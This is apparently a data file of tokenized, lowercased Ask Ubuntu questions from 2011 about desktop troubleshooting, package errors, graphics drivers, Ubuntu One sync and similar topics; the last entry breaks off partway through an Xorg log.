63690	how to restore evolution ' mails	i probably made a big mistake couple days ago - tried gnome 3 on my natty 11.04 laptop : ) as a result the system become unusable and i was forced to reinstall natty . i did fresh installation with formatting of my home partition ( usually i do that way ) . the only one thing what i care about it 's my mails ( evolution ) . usually i make a copy of .local/share/evolution/ directory , and then after installation just copy it into the same directory - it was absolutely enough for me before ( i did it at least 4 times ) . but this time i 've got an error from evolution - unable to retrieve message as far as i understood gnmome 3 had changed structure of nautilus and moved evolution contents into another place : ( is there any chance to get my mails back into evolution somehow ? i would be very appreciated for help edit : some additional info to my question - i have hotmail account , so the messages retrieves by evolution directly from msn server ( pop ) , and i do n't leave the copies of the mails on the server . so , the only place where messages are resists - it 's my laptop edit 2 : here you can see output of id command : uid=1000 ( justas ) gid=1000 ( justas ) groups=1000 ( justas ) ,4 ( adm ) ,20 ( dialout ) ,24 ( cdrom ) ,46 ( plugdev ) ,112 ( lpadmin ) ,120 ( admin ) ,122 > ( sambashare ) and output of ls -nd /home/justas/.local/share/evolution command : drwx -- -- -- 8 1000 1000 4096 2011-09-30 00:37 /home/justas/.local/share/evolution
63694	can i speed up file sync for ubuntu one ?	i am using ubuntu 11.04 on my home laptop and the same on my work laptop . i just wanted to sync the work folders on my home laptop to my office laptop which is ~300mb of data . this would normally be a short download but ubuntu-one is taking forever to sync it . any ideas what could cause this ? i am not behind any firewall or anything of that sort . i have not checked the limit bandwidth box in the preferences .
63695	install ubuntu and erase windows vista for good	i want install ubuntu but i ca n't erase windows vista ... . how to do it ? i have an acer aspice 4930 . /gilbert
63696	resolution issue causing login screen loop	my ubuntu ( version 10.10 i think ) is stuck in loop at the login screen . looks like it could be a resolution issue . - i have an nvidia graphics card ( gs 8400 ) . i previously had it connected to a 19 '' monitor however disconnected mid session and since then the issue has persisted . i tried uninstalling the gdm package and reinstalling and running an apt-get update however the login loop still there . is there another way i can reset the resolution settings to fix this looping issue ? i can get into the desktop by going through the rescue mode and using startx but its not a solution .
63700	usb device no longer 'powering ' up in ubuntu	i 've run across a weird issue that i was wondering if anyone had seen before . we run a custom version of ubuntu 10.04 at work and we 've been testing some software that uses webcams recently , which 90 % of the time works great but we 've had a crash event on two separate pieces of hardware with quite different configurations which basically disables the in-built webcam completely . i 've run through checking lsmod , lsusb , dmesg to see if the device or module appears at all ( it does n't ) , the block reference in /dev disappears completely and for all intensive purposes the webcam is gone . we then ran through a series of tests culminating in a fresh install of ubuntu 10.04 lts with no tweaks which once again could n't find the webcam , the only way we could get it to appear was to install xp , autodetect it , then swap back into ubuntu which would then acknowledge it . my initial thoughts run to something to do with power control ( i used to have an aspire one , and if you used the wifi power off switch a similar thing would happen ) , but i have no idea whether i 'm on the right track or where to start looking to try resolve that one . any thoughts about what could cause a device to become apparently 'powered off ' from the usb bus , and why it would require windows would be much appreciated . additional : we can actually get the cam to come back up if the machine has function keys for enable/disable webcam , but we 've still not isolated what triggers it .
63705	can i add audio recorder to the sound menu ?	i want to add my audio-recorder to ubuntu 's sound menu . sound menu seems to use mpris commands over dbus to control the media players . so i could implement a minimal mpris for audio-recorder as well . can i also change the icons that is shown on the sound menu ? i mean , can i add my own buttons under the media-player ? audio-recorder needs to display three icons/buttons for start , pause and stop recording . references : sound menu . mpris spec . audio recorder . annoucement on ubuntuforums.org .
63708	ubuntu one not syncing ... in windows xp sp3	i already install the ubuntu one 2.0 to try to connect to my storage , like i had done with beta , all of then installed correctly but when i try to sign in with my account it take a long time to get my information and it does n't connect . when i log into the ubuntu one site i connect without any problem . after one hour i receive a error pop-up with title `` ubuntuone-control-panel-qt '' with the error message `` attributeerror `` 'nonetype ? object has no attribute 'get_rootdir ' '' .
63709	how do i downgrade firefox ?	i only have 10 addons installed but many of them they stop working on every update . since the updates to not bring any new noticeable features but break them i do n't want any updates anymore . i could lock firefox , but of course i still want security updates . i want to `` pin '' it to 7 . * or preferably downgrade to 6.* . how do i do that without mozilla.debian.net ? will old versions still get security fixes ?
63710	to solve why at spi registry closed unexpectly	i get the following error report in 11.10 every time after logging in . compiz sometimes too crashes . my apport fails to send the data to launchpad for some reason so the button report problem not working .
63711	building a static version of python ?	i tried asking this question at stackoverflow , but the dead silence that followed made me wonder if some more ubuntu-specific expertise might be required . i am trying to build a static version of python thusly : ./configure -- disable-shared ldflags= '' -static -static-libgcc '' cppflags= '' -static '' however , running make configured as above eventually barfs up some warnings and an error : gcc -pthread -static -static-libgcc -xlinker -export-dynamic -o python \ modules/python.o \ libpython2.7.a -lpthread -ldl -lutil -lm < snip > libpython2.7.a ( posixmodule.o ) : in function `posix_initgroups ' : python-2.7.2/./modules/posixmodule.c:3981 : warning : using 'initgroups ' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking /usr/bin/ld : dynamic stt_gnu_ifunc symbol `strcmp ' with pointer equality in `/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.5.2/../../../libc.a ( strcmp.o ) ' can not be used when making an executable ; recompile with -fpie and relink with -pie collect2 : ld returned 1 exit status i 'm stuck . it appears to be asking me to recompile libc . i thought -static-libgcc would be enough , but apparently it is not . i do n't know if there is something wrong with the libc being linked or if there is something wrong with my compilation flags . this makes it hard to proceed . does anyone know what is going on here , and how to achieve my goal of building a static python on ubuntu 11.04 ?
63713	hp pavilion dv6 is not booting with switchable graphics	i have an hp pavilion dv6 with switchable graphics : an integrated intel gpu and a discrete ati gpu ( radeon mobility hd 6490m ( 1 gb ddr5 ) ) . any attempt to use the ati driver ( either proprietary or open-source ) fails because on reboot it tries to use the intel graphics and so x fails to start up . normally there should be an option to disable the switchable setting in the bios but hp have not allowed that set up . basically i 'm stuck . thanks for your help !
63714	working around encoding issues on windows with .m3u files	i 'm syncing .mp3 files with utf-8 filenames and .m3u playlists referencing these filenames -- generated on an ubuntu system -- to a windows machine . .mp3 filenames appear correctly in the windows explorer , but when trying to play a .m3u playlist with windows media player , it shows broken filenames and skips over files with non-ascii characters . i guess the filenames are stored in another encoding than utf-8 on windows , which ubuntu one does n't really care about , but the contents of the .m3u files are n't translated . i 'm looking for suggestions in dealing with this ! : - ) thanks ! -- lo誰c minier
63715	how to install 64-bit libraries on 32-bit system ?	i need to cross-compile for 64-bit architecture on a 32-bit platform ( using gcc-multilib and -m64 flag ) . for this i need to install 64-bit versions of the dependent libraries . how do i do that ?
63716	make a complete new installation , or upgrade continuously to new releases ?	i have an ubuntu system , which has been upgraded to the actual release since 9.04 . now i am wondering if upgrading during such a long time has any disadvantages . can i relay on the upgrading process to remove really all those old components , which are not used anymore , as hal for example ? or do i have to do some manual work on that ? for example i found out that a package named has is still installed , although in a brand new ubuntu 11.04 installation it isnât ? so is it recommended to make a complete new installation from time to time , rather than to upgrade continuously ?
63717	execute command after dpkg installation ?	i just got inspired of this project : http : //www.opendesktop.org/content/show.php ? content=145633 well , i wanted to do a similar thing , after dpkg places something new in /usr/share/applications directory , but where should my script point to , and the parameter to pass in ?
63723	syntax error in bandwidthd package causing upgrades to break	automatic update gives me option to update some packages . i tried to do this , but after downloading packages it gives me error . output is : installarchives ( ) failed : preconfiguring packages ... cp : can not stat `/usr/share/doc/bandwidthd/bandwidthd.conf ' : no such file or directory bandwidthd failed to preconfigure , with exit status 1 preconfiguring packages ... cp : can not stat `/usr/share/doc/bandwidthd/bandwidthd.conf ' : no such file or directory bandwidthd failed to preconfigure , with exit status 1 ( reading database ... ( reading database ... 5 % ... ( reading database ... 100 % ( reading database ... 303040 files and directories currently installed . ) preparing to replace bandwidthd 2.0.1 ( using ... /bandwidthd_2.0.1+cvs20090917-4_i386.deb ) ... /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` stop '' failed . dpkg : warning : subprocess old pre-removal script returned error exit status 2 dpkg - trying script from the new package instead ... /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` stop '' failed . dpkg : error processing /var/cache/apt/archives/bandwidthd_2.0.1+cvs20090917-4_i386.deb ( -- unpack ) : subprocess new pre-removal script returned error exit status 2 no apport report written because maxreports is reached already update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : /var/cache/apt/archives/bandwidthd_2.0.1+cvs20090917-4_i386.deb dpkg : error processing bandwidthd ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . edit : sudo dpkg -- purge -- force-all bandwidthd gives : dpkg : warning : overriding problem because -- force enabled : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . ( reading database ... 303039 files and directories currently installed . ) removing bandwidthd ... /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` stop '' failed . dpkg : error processing bandwidthd ( -- purge ) : subprocess installed pre-removal script returned error exit status 2 update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 2 errors were encountered while processing : bandwidthd edit2 : sudo dpkg-reconfigure bandwidthd -- force gives : update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed .
63724	how do i start firefox in another language than the default ?	i want to temporarily use firefox in another languages so that menus and everything else in another language . how can i do that ? i have tried firefox -no-remote -uilocale en-gb but that still loads firefox with my default locale ( i have en-gb locale for firefox installed ) . i also found https : //bugs.launchpad.net/ubuntu/+source/firefox/+bug/565209 but i dunno if it 's due to that .
63728	how do i enable submission of performance data in firefox 7 ?	one item in the release notes of firefox 7 reads added an opt-in system for users to send performance data back to mozilla to improve future versions of firefox this is feature is also called telemetry . how can i enable it ?
63732	how do i prevent unity-2d launcher from showing when i touch left edge of screen ?	one of the things i really liked about 11.04 was how i could make the launcher only show when i moved the mouse to a corner . in 11.10 unity-2d the launcher shows every time my mouse goes against the left edge of the screen -- this results in the launcher always sliding out when i do n't want it to . i tried installing ccsm but it appears not to work with unity-2d . and , although i find it hard to believe that no such setting exists , i can find no setting that will disable the left-edge trigger . is there a way to move the trigger to the bottom-left corner or even disable the trigger completely ? i 'd actually prefer to just press the super key and access the launcher that way .
63734	how to use ( /enable ) fn keys to adjust volume at my asus laptop ?	i have an asus laptop ( asus x53s series ) and i want to adjust the volume by using the fn key and f10 ( mute ) , f11 ( vol down ) , f12 ( vol up ) . also f9 key is not working as well ( this is for enabling/disabling the touchpad ) . i have seen this question but did n't see any solution . all the other fn buttons seem to work ( changing brightness , turning off display , switching off wifi ) . is there any way to do so ?
63736	ubuntu 11.04 stable configuration	i am looking to upgrade my hardware , but i noticed that people were having issues with modern processors like sandy bridge a while ago . i wonder if someone can suggest a stable configuration ( processor , motherboard and optionally graphics ) of medium performance . i do n't care about overclocking , i just want it to be run stable with ubuntu 11.04 . are sandy bridge systems are now considered stable with ubuntu ?
63739	how to set up an sstp vpn connection ?	the question is simple : how to set up an sstp vpn connection in ubuntu 11.04 ? as of this moment i have n't been able to find a way to make an sstp vpn connection .
63741	can i ssh into my account without invoking .profile ?	i want to ssh into my account , but i do n't want the current version of my .profile login script to be executed . is there a way to log in without running .profile ? ( disclaimer : i found a work-around which i posted below , but i wonder if there 's a better answer )
63743	voice control over desktop enviornment	i would like to enable a system that can respond to user voice commands and run scripts according to the verbal command given . ideally , i would like for the computer to be listening constantly . once it hears the buzz word `` computer '' it will activate and listen for commands for 10 seconds ( or so ) . once active , and while it 's listening , i would like for another set of buzz words to be able to run scripts . for instance ... . ( computer is idle ) `` computer '' ( computer immediately listens ) `` access new messages '' ( messages being buzz word *ignores `` access new '' -- computer runs a script and opens evolution or empathy ) . there could be one for browser , one for closing windows and showing desktop , or a bunch of stuff really . is this even possible ?
63746	how to measure single app cpu usage over time ?	i 'm doing some performance test for apps in ubuntu . is there a nice way ( or an application ) to measure the cpu usage of a single app ? i would be great if it was also possible to create charts of cpu usage over time , but that 's not a necessity .
63749	how to show desktop application launchers only in a certain desktop environment ?	i use gnome and xfce sessions , but whereas in gnome i have application shortcuts on the panel , in xfce i prefer having application launchers on the desktop . i do n't need the desktop launcher in gnome , so i would like to have them hidden in the ubuntu classic session . i tried to append the onlyshowin=xfce option at the bottom of the .desktop files in the desktop folder , but to no avail .
63759	why does my laptop get too hot when the ac power is plugged in ?	im using natty and when my computer is on ac power it gets very hot ( no independent graphic card ) . but when im with only battery , the machine itself is quite cool . i 've just tried sometime on the power management but seems ca n't tune my computer cooler when with ac power , as i does on battery . any suggestions ?
63760	how does jupiter work	jupiter is a powersaving applet , which can switch between maximum power , high power and save power . definitely it does more than just setting the cpu speed , as the recommendations of powertop change at least when in high power mode or save power mode . the main page of jupiter claims that kernel settings are tweaked for powersaving . does anybody know which tweaks are applied by jupiter ?
63763	command or script to open specific programs to different virtual desktops	my ubuntu setup uses 4 virtual desktops ( 1 high , 4 accross ) . as a programmer , i almost always open the same 4 windows in the same configuration , across my 4 virtual desktops : | firefox | netbeans ide | firefox | spotify | i am hoping to come up with a single command that will launch each of these programs to their corresponding window . pseudocode might look like : open firefox on desktop 1 to gmail.com open netbeans on desktop 2 open firefox on desktop 3 to localhost open spotify on desktop 4 does anyone know how i might create a simple script i could launch from my desktop to help me do this ? or at least a command parameter that causes a program to open to a specific desktop ? thanks !
63765	how do i create a quicklist for ubuntu tweak ?	i want to create a quicklist for ubuntu tweak on my unity launcher , but i 'm having trouble getting started . can anyone help ?
63767	how do i restart the window manager ?	how to restart window manager so that styles ( or whatever ) are restored ? after doing /etc/init.d/networking stop they feel completely broken .
63772	can i use aptana with quickly ?	i want to develop python apps with aptana , i really love this editor . is possible to develop python apps with quickly + aptana or only quickly + gedit ?
63773	ubuntu sync using too many resources	i 'm running 10.04 lts and the ubuntu-sync process is really using a lot memory and cpu resources , especially as time goes on during the day . when i start out the day , ( and do a top ) the cpu % is typically 6.0 and % mem 0.8 , but as the day goes these numbers increase until my notebook is all but unusable , at which point i have to either re-boot or kill the process . just today it was using 1.9g of memory . using system monitor right now , and looking at memory usage the mib number for ubuntu-syncdaemon is only going up . same problem on ubuntu 11.04 . ubuntuone get 25 % of my 4gb of memory to synchronize . i 'm using an hp elitebook 8640p basic configuration . i do n't have the same problem on my dell xps1330 with the same ubuntu version .
63774	ca n't log into ubuntu one for android	just installed ubuntu one into my sonyericsson , i run android 2.2 on that device . the problem is to log into ubuntu one , i tried both wifi and 3g-net . but ubuntu one only says that `` service unavailable '' i run ubuntu 11.04 on both laptop and desktop and only problem i have there is syncronisation of bookmarks in firefox . but thats another problem = ) hope i can get ubuntu one to work on cellphone
63777	what 's the best way to optimize power management ?	i decided to give ubuntu a chance on my laptop ( actually , it 's a netbook ) . this netbook is capable of 7 hours battery life on windows 7 and i only get around 3 hours with ubuntu . i 'm a newbie , but i think that the default power management in ubuntu is no good . so , my question is , what 's the best way to optimize ubuntu to get as much battery as i can ?
63779	ca n't boot when hdmi is plugged in ?	ok here is a thing i want use ubuntu as media center with my 42 '' plasma tv connected with hdmi first i installed windows and all worked fine hdmi port worked fine with movies but u know windows sometimes it works sometimes it updates in middle of movie and then restart itself or network just decide to not work or there is no sound on hdmi but when u restart few times hey there is sound to so i decide to install ubuntu 11.04 64bit and be happy cause i never have problems with ubuntu and when i installed all and connected my pc to tv using hdmi but when i do that ubuntu wont boot nor display image . if hdmi is off it boots normaly and i can access it remotely with ssh . when i plug in back hdmi still no display ? so i search around google how to make it work and there is few articles about edid so i guess i need that edid for my tv and put it inside xorg.conf but i cant get my edid couse ubuntu wont boot if there is hdmi so im wondering what i can do to fix that first step thats booting with hdmi ? and how to get that edid and display picture on tv with sound trougt hdmi if anyone can help ? ? i have msi k9ngm3-fih - aka ( ms-7349ver:1.1 ) motherboard with hdmi on board here is link ! pdp-427xd pioneer plasma tv here is link ! i think other specs are not important couse all works just tv , ubuntu and hdmi are not frendly
63781	can not install updates on wubi	i installed a wubi on my optiplex gx 620 recently on top of a windows xp . but after using it for about two weeks , i notice that the software update can never be carried out again . every time i log in the system reminds me to do updates , but when i press the update button it flashes out a temporary message box ( for about half a second ) saying there is some authentication error ( i ca n't get the complete message since it 's too fast ) . this did n't bother me too much until today when i want to install foreign language support . the same flash message box appeared again and the installation can not be done . after waiting for about 5 minutes a message box pops out saying `` time out most likely the daemon died '' . i can give more details but i thought this might be a generic problem with wubi installation ? updates : after following the advice of fossfreedom , i think the upgrading is up and running ! before i only typed in sudo apt-get update , but i guess it 's important to do upgrade as well ! thanks a lot ! my only lingering concern is how to do this upgrading automatically outside terminal . it seems there should be a way to enter password in a gui ? it would also be nice because sometimes i do n't know the name of a particular software ( like a language package ) so it 's easier to just upgrade in a gui .
63782	add ad domain user to sudoers from the command line	i 'm setting up an ubuntu 11.04 server vm for use as a database server . it would make everyone 's lives easier if we could have folks login using windows credentials and perhaps even make the machine work with the current ad-driven security we 've got elsewhere . the first leg of this was really easy to accomplish -- apt-get install likewise-open and i was pretty much in business . the problem i 'm having is getting our admins into the sudoers groups -- i ca n't seem to get anything to take . i 've tried : a ) usermod -ag sudoers [ username ] b ) adding the user names in several formats ( domain\user , user @ domain ) to the sudoers file . none of which seemed to take , i still get told `` domain\user is not in the sudoers file . this incident will be reported . '' so , how do i add non-local users to the sudoers ?
63786	is this a ubuntu software center bug : net connection not available	ubuntu software center does not recognize my net connection when i connect using wvdial , which i often do ( even though network-manager works ) . is this a bug ? if so , where do i file a bug report for this ? regards , santanu
63788	wireless working but not connecting to my router ?	i can not connect to my router but the wireless connection displays all the available connections . it attempts to connect after i type in the password but does nothing but keep asking for password after not connecting for 5 minutes .
63791	which folders are often written to , and how can i mount those folders on a separate drive ?	i have a headless ubuntu server acting as a fileserver ( samba and ssh ) and sometimes virtualbox host . it is currently running from a usb drive , since all hard drive slots on the motherboard are occupied . since any os can be rather write happy , and flash memory drives have limited write lifespan , i want to minimize the number of writes the os makes to the drive . i have already moved the swap files to one of the hard drives . can i mount any other 'chatty ' folders on the hard drives as well ? ( i imagine /var/log makes a few writes ever so often ) which folders in a normal base ubuntu install are often written to , and how can i mount those folders on a separate drive ?
63796	how do i view coredump file ?	when reporting a bug from a crash , the bug is made private and a file called coredump.gz . the bug triage documentation says the following : if the crash still has a coredump.gz attachment , then it was not possible to automatically get a fully symbolic stack trace and check for duplicates . stacktrace.txt seems readable by a human . how can i understand the meaning of a stack trace . coredump withing coredump.gz does not seem human readable . what is a `` fully symbolic stack trace '' ? what is the difference between a `` fully symbolic stack trace '' how do i view the contents of a coredump file ? ( tried 'cat ' , but it 's not clean )
63798	lsb error messages when running an upgrade	after running sudo apt-get update & & sudo apt-get upgrade , i am shown this message in the terminal : package configuration configuring sysv-rc unable to migrate to dependency-based boot system tests have determined that problems in the boot system exist which prevent migration to dependency-based boot sequencing : insserv : warning : script 'k20acpi-support ' missing lsb tags and overrides , insserv : warning : script 'alsa-store ' missing lsb tags and overrides , insserv : warning : script 'irqbalance ' missing lsb tags and overrides , insserv : warning : script 'dbus ' missing lsb tags and overrides , insserv : warning : script 'udevtrigger ' missing lsb tags and overrides , insserv : warning : script 'gdm ' missing lsb tags and overrides , insserv : warning : script 'console-setup ' missing lsb tags and configuring sysv-rc unable to migrate to dependency-based boot system tests have determined that problems in the boot system exist which prevent migration to dependency-based boot sequencing : insserv : warning : script 'k20acpi-support ' missing lsb tags and overrides , insserv : warning : script 'alsa-store ' missing lsb tags and overrides , insserv : warning : script 'irqbalance ' missing lsb tags and overrides , insserv : warning : script 'dbus ' missing lsb tags and overrides , insserv : warning : script 'udevtrigger ' missing lsb tags and overrides , insserv : warning : script 'gdm ' missing lsb tags and overrides , insserv : warning : script 'console-setup ' missing lsb tags and ok i am not sure how to fix that . help is much appreciated !
63805	what version of varnish should i run on 11.04 ?	i went to ubuntu 's main site and downloaded the latest lts version 11.04 . now i 'm trying to install varnish on it , and following the steps on the downloads page for ubuntu i added the new repo but it has /natty/ in the url , and when i try and to an apt-get update i noticed there is a 404 error since that url does n't exist . i see they only have this distro 's with packages : http : //repo.varnish-cache.org/ubuntu/dists/ its lts one of these , or is lts considered natty or ?
63810	every time i log on my i need to reload window manager	every time i log on my ubuntu in gnome i have to run fusion icon and do `` reload window manager '' to make the window title and close/maximize buttons appear .
63813	easy native package rebuild	what 's easiest way of to rebuild a package in debian/ubuntu using a specific set of cflags/cxxflags . in all the tutorials i have read so far , for example this one , they all refer to debian 's way which is about 5-10 command line calls depending what want to do . but if i simply want to rebuild a package with -march=native it should be as simple as gentoo 's cflags=-march=native emerge package . scripts for that any one ? why is n't ubuntu as user friendly as gentoo in this aspect ?
63816	i ca n't create bootable usb drive with startup disc creator	after reinstallation of natty , i had lost ability to create bootable usb drive with startup disc creator . when i try to add iso image into ( through the button `` other '' ) , nothing happend . dics creator do n't add source disc image i had tried to re-install startup disc creator , but it does n't help . thanks in advance for any help
63818	how can i play .smil videos ?	i want to see some videos that are composed of one .smil file and two .rm files . ( the .smil says to play the two videos at the same time ) if i try to play the .smil , totem player starts but shows me just one of the two .rm , so it 's not useful . i used to play them with reaplayer , but i seen that is no more supported , so i was wondering if there was a better solution .
63820	how do you change the highligter for files ?	how do you change the highligter for files ? do n't know how you do this . i do know how it happened . how do i change it back to orange ? see image and ask me questions . also i am using 11.10 .
63824	can i change the linux console ( ctrl+alt+f1 ) font to ubuntu mono ?	is there a way to set a specific ttf font to be used on the console ? ( i believe you might have to convert it to a bitmap font ? ) if it needs to be converted , what tools can i use to do the conversion ? otherwise , how do i pick ubuntu monospace for my console font ? ( i already have the ubuntu monospace font installed from the beta ppa for it . ) edit : i already set gnome-terminal to use ubuntu mono . now i 'm wanting to set the all-text screens i get when i press ctrl+alt+f1 to use the same font .
63831	ubuntu one api file upload maximum size	i 'm making an application using ubunuone rest api in order to upload files to the ubuntu storage service . file storage api i can achieve uploading some files , but when i try to upload a large file ( 90mb ) it fails returning http 302 code . does anyone know if there is a limit ? it seems than only works with smaller files , i could n't find which size is the limit . does anyone achieved to upload a large file using the rest api . thanks in advance
63834	writing a `` hello world '' device driver for kernel 2.6 using eclipse	goal i am trying to write a simple device driver on ubuntu . i want to do this using eclipse ( or a better ide that is suitable for driver programming ) . here is the code : # include < linux/module.h > static int __init hello_world ( void ) { printk ( `` hello world ! \n '' ) ; return 0 ; } static void __exit goodbye_world ( void ) { printk ( `` goodbye world ! \n '' ) ; } module_init ( hello_world ) ; module_exit ( goodbye_world ) ; my effort after some research , i decided to use eclipse ctd for developing the driver ( while i am still not sure if it supports multi-threading debugging tools ) . so i : installed ubuntu 11.04 desktop x86 on a vmware virtual machine , installed eclipse-cdt and linux-headers-2.6.38-8 using synaptic package manager , created a c project named testdriver1 and copy-pasted above code to it , changed the default build command , make , to the following customized build command : make -c /lib/modules/2.6.38-8-generic/build m=/home/isaac/workspace/testdriver1 the problem i get an error when i try to build this project using eclipse . here is the log for the build : **** build of configuration debug for project testdriver1 **** make -c /lib/modules/2.6.38-8-generic/build m=/home/isaac/workspace/testdriver1 all make : entering directory '/usr/src/linux-headers-2.6.38-8-generic' make : *** no rule to make target vmlinux ' , needed byall ' . stop . make : leaving directory '/usr/src/linux-headers-2.6.38-8-generic' interestingly , i get no error when i use shell instead of eclipse to build this project . to use shell , i just create a makefile containing obj-m += testdriver1.o and use the above make command to build . so , something must be wrong with the eclipse makefile . maybe it is looking for the vmlinux architecture ( ? ) or something while current architecture is x86 . maybe it 's because of vmware ? as i understood , eclipse creates the makefiles automatically and modifying it manually would cause errors in the future or make managing makefile difficult . so , how can i compile this project on eclipse ?
63837	how to change the color themes in gnome 3 ?	how to change the color themes in gnome 3 ? anyone ? ( note using 11.10 )
63841	nvidia nvs 4200m problems on lenovo t420s	i have a problem in getting the nvidia card to load . i get the classic `` no screens '' found . i 've even forced it to used `` connectedmonitor '' dfp-0 for my laptop screen . i suspect that something is wrong with my settings that will recognize my flat panel . my nvidia drivers do not see it and then optimus kicks in the onboard intel video drivers and it loads up x that way . i have tried all the different variations with no avail ( nouveau , bumblebee+nvidia_current , nvidia-current alone , and nvidia drivers from nvidia site ) . interestingly enough , if i attach a monitor via dvi connector through a docking station , nvidia drivers load up successfully and finds dfp-3 . the external monitor gets unity loaded , but the laptop monitor goes blank . help ! current xorg.conf : section `` serverlayout '' screen `` screen0 '' relative `` screen1 '' 0 0 identifier `` layout0 '' screen `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` sendcoreevents '' `` corekeyboard '' inputdevice `` mouse0 '' `` sendcoreevents '' `` corepointer '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` samsung '' modelname `` samsung sms27a850 '' horizsync 30.0 - 90.0 vertrefresh 56.0 - 75.0 endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 4200m '' busid `` pci:1:0:0 '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` nvs 4200m '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` metamodes '' `` dfp-0 : nvidia-auto-select , nvidia-auto-select '' option `` twinview '' `` true '' option `` randrrotation '' `` true '' subsection `` display '' depth 24 modes `` 1600x900 '' `` 1920x1080 '' `` 2560x1440 '' endsubsection endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 option `` twinview '' `` true '' option `` randrrotation '' `` true '' subsection `` display '' depth 24 modes `` 1600x900 '' `` 1920x1080 '' `` 2560x1440 '' endsubsection endsection lspci results lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0126 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1056 ] ( rev a1 ) my gpu info nvidia-xconfig -- query-gpu-info if i do n't have the external monitor connected and i query gpu info : number of gpus : 1 gpu # 0 : name : nvs 4200m pci busid : pci:1:0:0 number of display devices : 0 if i do have it ... it shows me that i have one display device connected . my xorg.0.log : [ 7.228 ] x.org x server 1.10.1 release date : 2011-04-15 [ 7.228 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 7.228 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri sep 30 20:39:30 2011 [ 7.229 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 7.229 ] ( == ) no layout section . using the first screen section . [ 7.229 ] ( == ) no screen section available . using defaults . [ 7.229 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 7.229 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 7.229 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 7.229 ] ( == ) automatically adding devices [ 7.229 ] ( == ) automatically enabling devices [ 7.229 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 7.229 ] entry deleted from font path . [ 7.229 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 7.229 ] entry deleted from font path . [ 7.229 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 7.229 ] entry deleted from font path . [ 7.230 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 7.230 ] entry deleted from font path . [ 7.230 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 7.230 ] entry deleted from font path . [ 7.230 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 7.230 ] ( == ) modulepath set to `` /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 7.230 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 7.230 ] ( ii ) loader magic : 0x7e17e0 [ 7.230 ] ( ii ) module abi versions : [ 7.230 ] x.org ansi c emulation : 0.4 [ 7.230 ] x.org video driver : 10.0 [ 7.230 ] x.org xinput driver : 12.3 [ 7.231 ] x.org server extension : 5.0 [ 7.231 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0126:17aa:21d3 rev 9 , mem @ 0xf1400000/4194304 , 0xe0000000/268435456 , i/o @ 0x00005000/64 [ 7.231 ] ( -- ) pci : ( 0:1:0:0 ) 10de:1056:17aa:21d3 rev 161 , mem @ 0xf0000000/16777216 , 0xc0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00004000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 7.231 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 7.231 ] ( ii ) loadmodule : `` extmod '' [ 7.233 ] ( ii ) loading 